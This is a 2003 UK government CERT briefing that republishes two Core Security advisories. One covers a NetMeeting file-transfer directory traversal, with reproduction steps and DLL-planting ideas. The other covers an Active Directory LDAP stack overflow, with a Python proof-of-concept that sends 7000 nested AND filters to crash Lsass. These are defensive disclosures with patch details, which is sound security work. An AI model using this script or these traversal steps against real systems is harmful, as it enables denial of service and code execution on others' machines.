[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

UNIRAS Brief - 379/03 - Two Core Security Advisories.



-----BEGIN PGP SIGNED MESSAGE-----

- ----------------------------------------------------------------------------------
   UNIRAS (UK Govt CERT) Briefing Notice - 379/03 dated 03.07.03  Time: 09:30
 UNIRAS is part of NISCC(National Infrastructure Security Co-ordination Centre)
- ----------------------------------------------------------------------------------
  UNIRAS material is also available from its website at www.uniras.gov.uk and
         Information about NISCC is available from www.niscc.gov.uk
- ----------------------------------------------------------------------------------

Title
=====

Two Core Security Advisories

1. NetMeeting Directory Traversal Vulnerability

2. Active Directory Stack Overflow


Detail
======

1. A directory traversal vulnerability was found in NetMeeting when
doing File Transfers. An attacker can use filenames containing "..\..\"
when doing a file transfer, and in this manner, create a file in any
place of the victim's filesystem, escaping the directory where
NetMeeting usually stores incoming files (e.g. C:\Program Files\
Received\Received Files).

2. A vulnerability in Active Directory allows an attacker to crash and force
a reboot of any Windows 2000 Server running the Active Directory service.

The vulnerability can be triggered when an LDAP version 3 search request
with more than 1000 "AND" statements is sent to the server, resulting in a
stack overflow and subsequent crash of the Lsaas.exe service.



1.         ESB-2003.0460 -- Core Security Technologies Advisory
               NetMeeting Directory Traversal Vulnerability
                               03 July 2003


Product:                Windows NetMeeting
Publisher:              Core Security Technologies
Operating System:       Windows
Impact:                 Execute Arbitrary Code/Commands
                        Create Arbitrary Files
Access Required:        Remote

- - --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                     NetMeeting Directory Traversal Vulnerability



Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-04

Bugtraq ID: 7931

CVE Name: None currently assigned.

Title: NetMeeting Directory Traversal Vulnerability

Class: Input validation error

Remotely Exploitable: Yes

Locally Exploitable: No

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=352&idxseccion=10

Vendors contacted:
  - Microsoft
    . Core Notification: 2003-05-21
    . Notification acknowledged by Microsoft: 2003-05-21
    . Issue fixed in Windows 2000 SP4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

  Windows NetMeeting is a popular application used to hold audio and video
  conferences between a group of persons. One of its features is "File
  Transfer" which lets you send one or more files in the background
  during a NetMeeting conference.

  A directory traversal vulnerability was found in NetMeeting when
  doing File Transfers. An attacker can use filenames containing "..\..\"
  when doing a file transfer, and in this manner, create a file in any
  place of the victim's filesystem, escaping the directory where
  NetMeeting usually stores incoming files (e.g. C:\Program Files\
  Received\Received Files).

  This makes it possible to force the execution of arbitrary code on
  vulnerable systems.


*Vulnerable Packages:*

  NetMeeting version 3.01 (4.4.3385).
  Other versions may also be vulnerable.


*Solution/Vendor Information/Workaround:*

  A fix for this issue is included in Windows 2000 SP4 and Windows XP SP1
  available from:

  Windows 2000 Service Pack 4
  http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

  Windows XP (Professional and Home edition) Service Pack 1
  http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/

  Windows Server 2003 does not ship with a vulnerable version of NetMeeting.


*Credits:*

  This vulnerability was found by Hernán Ochoa, Gustavo Ajzenman, Javier
  Garcia Di Palma and Pablo Rubinstein from Core Security Technologies
  during Bugweek 2003 (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  We have found a directory traversal vulnerability in NetMeeting when
  doing File Transfers. An attacker can use filenames containing "..\..\"
  when doing a file transfer, and in this manner, create a file in any
  place of the victim's filesystem, escaping the directory where
  NetMeeting usually stores incoming files (e.g.: C:\Program
  Files\Received\Received Files). An attacker cannot overwrite already
  existing files.

  A dialog box appears at the end of the file transfer, which can alert
  the user about the malicious action (the dialog box will not be
  automatically closed). However, the user is not prompted to reject or
  accept the file transfer, and since NetMeeting conferences can be
  shutdown by sending malformed packets (for example, by arbitrarily
  fuzzing data sent in packets interchanged during a chat conversation),
  the action can be hidden from the user. We're also investigating certain
  succession of packets that may prevent the dialog box from appearing
  at all.

  How to reproduce this vulnerability:

  - Start a NetMeeting conversation between two peers
  - Click on the "Transfer Files" button
  - Click on the "Add Files..." button and choose any file
    (e.g.: example_example_example.txt)
  - Attach a debugger to the NetMeeting process (conf.exe) and put a
    breakpoint on ws2_32!send
    (e.g.: ntsd -p <conf's pid> / bp send )
  - Click on the "Send All" button
  - The breakpoint set on ws2_32!send() will start popping up.
  - Examine the stack, and obtain the address of the buffer sent to the
    send() function, and examine its content
  - Look for the packet containing the name of the file being sent
    (e.g.: example_example_example.txt)
  - You're going to find two packets containing the filename, modify both
    packets with the debugger so that example_example_example.txt becomes
    ..\..\..\xample_example.txt
  - Let the process continue both times, and let the file transfer
    finish.
  - Now you can go to the root directory of the drive, and you'll see
    the file sent there instead of the "Received Files" directory.

  Of course, a debugger is not needed to exploit the vulnerability, it is
  just a convenient way to reproduce the vulnerability.

  We also found that by sending malformed packets in several different
  moments during a connection, all participants or a specific
  participant can be thrown out of the conversation. This is not a big
  issue per se, but it could help to hide malicious actions as the one
  described above (one can send the file, and immediately after, make the
  victim's NetMeeting drop the connection, which will make the dialog
  box of the file transfer disappear.)

  This vulnerability allows an attacker to execute arbitrary code.
  For instance, she can upload a specially crafted DLL with the name of
  one of the DLL's used by NetMeeting into the NetMeeting directory.
  The next time NetMeeting is executed, the system will try to load
  these DLL's first from the current directory, and then from
  C:\winnt\system32. So the system will load the attacker's DLL and
  execute arbitrary code upon the next execution of NetMeeting.
  Another possibility is to upload an executable file into the
  startup directory of win9x. That file will be executed the next
  time the user starts win9x.


*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.

  Headquartered in Boston, MA, Core Security Technologies can be reached
  at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: NetMeeting-advisory.txt,v 1.11 2003/07/02 15:45:46 carlos Exp $




2.          ESB-2003.0463 -- Core Security Technologies Advisory
                      Active Directory Stack Overflow
                               03 July 2003


Product:                Active Directory
Publisher:              Core Security Technologies
Operating System:       Windows
Impact:                 Denial of Service
Access Required:        Remote

- - --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                           Active Directory Stack Overflow


Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-03

Bugtraq ID: 7930

CVE Name: None currently assigned.

Title: Active Directory Stack Overflow

Class: Boundary Error Condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10

Vendors contacted:
  - Microsoft
    . Core Notification: 2003-05-16
    . Notification acknowledged by Microsoft: 2003-05-19
    . Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

  Active Directory, which is an essential component of the Windows 2000
  architecture, presents organizations with a directory service designed
  for distributed computing environments. Active Directory allows organizations
  to centrally manage and share information on network resources and users
  while acting as the central authority for network security.

  The directory services provided by Active Directory are based on the
  Lightweight Directory Access Protocol (LDAP) and thus Active Directory
  objects can be stored and retrieved using the LDAP protocol.

  A vulnerability in Active Directory allows an attacker to crash and force
  a reboot of any Windows 2000 Server running the Active Directory service.

  The vulnerability can be triggered when an LDAP version 3 search request
  with more than 1000 "AND" statements is sent to the server, resulting in a
  stack overflow and subsequent crash of the Lsaas.exe service.

  This in turn, will force a domain controller to stop responding, thus
  making possible a denial of service attack against it. The LDAP request
  does not need to be authenticated.

  The possibility of exploiting this vulnerability to execute arbitrary code
  on a vulnerable server has not been proved but is not discarded.


*Vulnerable Packages:*

  Windows 2000 Server with Active Directory (Service Pack 3).


*Solution/Vendor Information/Workaround:*

  This issue is fixed in Windows 2000 Service Pack 4, which can be
  donwloaded from:
  http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

  Further information about the vulnerability can be obtained from
  http://support.microsoft.com/default.aspx?kbid=319709


*Credits:*

  This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo
  Quesada and Damian Saura from Core Security Technologies during Bugweek 2003
  (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  A 'search request' created using LDAP version 3, constructed with more than
  1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash
  and rebooting the machine within 30 seconds.

  To reproduce the stack overflow, you need to create a 'search request' to
  an Active Directory server. The 'search request' must search for a non existent
  machine within the Domain Controller that you've previously bind to.

  It must be composed with more than 1000 AND statements but it is supposed that
  OR, GE, LE and other binary operators will yield the same results.

  Example of a Python script that creates such a request:

- - ------------------------------------
class ActiveDirectoryDOS( Ldap ):

     def __init__(self):
         self._s = None
         self.host = '192.168.0.1'
         self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
         self.port = 389
         self.buffer = ''
         self.msg_id = 1
         Ldap.__init__()

     def generateFilter_BinaryOp( self, filter ):
         filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
         filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
         return filterBuffer

     def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
         simpleBinOp = self.generateFilter_BinaryOp( filter )
         filterBuffer = simpleBinOp
         for cnt in range( 0, numTimes ):
             filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
         return filterBuffer


     def searchSub( self, filterBuffer ):

         self.bindRequest()
         self.searchRequest( filterBuffer )

     def run(self, host = '', basedn = '', name = '' ):

         # the machine must not exist
         machine_name = 'xaxax'

         filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

         # execute the anonymous query
         print 'executing query'
         filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
         self.searchSub( filterBuffer )

- - ------------------------------------


*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.
  Headquartered in Boston, MA, Core Security Technologies can be reached
  at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $




- ----------------------------------------------------------------------------------

For additional information or assistance, please contact the HELP Desk by
telephone or Not Protectively Marked information may be sent via EMail to:
uniras@xxxxxxxxxxxx

Office Hours:
Mon - Fri: 08:30 - 17:00 Hrs
Tel: +44 (0) 20 7821 1330 Ext 4511
Fax: +44 (0) 20 7821 1686

Outside of Office Hours:
On Call Duty Officer:
Tel: +44 (0) 20 7821 1330 and follow the prompts

- ----------------------------------------------------------------------------------
UNIRAS wishes to acknowledge the contributions of Coresecurity for the information
contained in this Briefing.
- ----------------------------------------------------------------------------------
This Briefing contains the information released by the original author. Some
of the information may have changed since it was released. If the vulnerability
affects you, it may be prudent to retrieve the advisory from the canonical site
to ensure that you receive the most current information concerning that problem.

Reference to any specific commercial product, process, or service by trade
name, trademark manufacturer, or otherwise, does not constitute or imply
its endorsement, recommendation, or favouring by UNIRAS or NISCC.  The views
and opinions of authors expressed within this notice shall not be used for
advertising or product endorsement purposes.

Neither UNIRAS or NISCC shall also accept responsibility for any errors
or omissions contained within this briefing notice. In particular, they shall
not be liable for any loss or damage whatsoever, arising from or in connection
with the usage of information contained within this notice.

UNIRAS is a member of the Forum of Incident Response and Security Teams (FIRST)
and has contacts with other international Incident Response Teams (IRTs) in
order to foster cooperation and coordination in incident prevention, to prompt
rapid reaction to incidents, and to promote information sharing amongst its
members and the community at large.
- ----------------------------------------------------------------------------------
<End of UNIRAS Briefing>
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQCVAwUBPwPqropao72zK539AQGLPQP/c9609JWSGDcCAsQzwOg3gDjersPoQS+8
Oocl2SyNBuYo36c2G7s/xMc2EohRAgBX6iedEt2u2mM7U2oRVz4T2m0Bv23jSE2g
d+YYVzyLPCpVvg0F+/UoKMHFzeL+2hRrTy7LOjIUjGxCtiQ8rRmWOuZvpEHlq5jF
I3kUvFaXZwI=
=itkf
-----END PGP SIGNATURE-----